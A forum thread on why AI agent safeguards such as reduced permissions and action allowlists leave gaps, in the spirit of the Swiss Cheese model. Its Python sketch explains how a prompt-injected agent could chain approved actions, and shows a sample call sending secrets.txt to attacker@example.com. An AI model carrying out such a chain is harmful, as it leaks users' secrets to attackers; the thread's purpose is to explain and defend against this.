The sort of fun thing is that this happens with human safety teams too. The Swiss Cheese model is generally used to understand how individual failures can line up and let a disaster punch right through the guardrails:

https://medium.com/backchannel/how-technology-led-a-hospital...

It's better to close the hole entirely by making dangerous actions actually impossible, but often (even with computers) there's some wiggle room. For example, if we reduce the agent's permissions, we haven't eliminated the possibility of the dangerous action, merely required some sort of privilege escalation before it can happen. If we give the agent an approved list of actions, we may still have unintended and unsafe interactions between those actions, or some way for an attacker to add an unsafe action to the list. And so on, and so forth.
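
To make the approved-list point concrete, here's a rough Python sketch (the action names and tools are made up, not any real agent framework): each call clears the allowlist on its own, but the check knows nothing about how approved actions combine.

    # Hypothetical allowlist gate in front of an agent's tool calls.
    APPROVED_ACTIONS = {"read_file", "send_email"}

    def read_file(path: str) -> str:
        # An individually "safe" action.
        with open(path) as f:
            return f.read()

    def send_email(to: str, body: str) -> str:
        # Stubbed out; pretend this actually sends mail.
        return f"queued message to {to}"

    TOOLS = {"read_file": read_file, "send_email": send_email}

    def dispatch(action: str, **kwargs):
        # Each action is vetted on its own...
        if action not in APPROVED_ACTIONS:
            raise PermissionError(f"{action!r} is not on the approved list")
        # ...but nothing here reasons about sequences: read_file and
        # send_email are each approved, yet a prompt-injected agent can
        # chain them to mail out whatever read_file just returned.
        return TOOLS[action](**kwargs)

dispatch("read_file", path="secrets.txt") and dispatch("send_email", to="attacker@example.com", body=...) each pass the gate individually, which is exactly the leftover hole.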

In the case of an AI model, just like with humans, the security model really should not assume that the model will not "make mistakes." It has a random number generator built right in. It will, just like the user, occasionally do dumb things, misunderstand policies, and break rules. Those risks have to be factored in if one is to use the things at all.

Humans are dramatically harder targets than LLMs. An LLM is like a human you can memory-wipe and try to phish hundreds of times a second until you find a script that works. I agree with what you're saying, but it's important to be clear that an LLM is not like a security guard who will occasionally let a former employee in because they recognize them. They can be attacked pretty relentlessly, and once they're open, they're wide open.

Thank you for that link, that was a great read.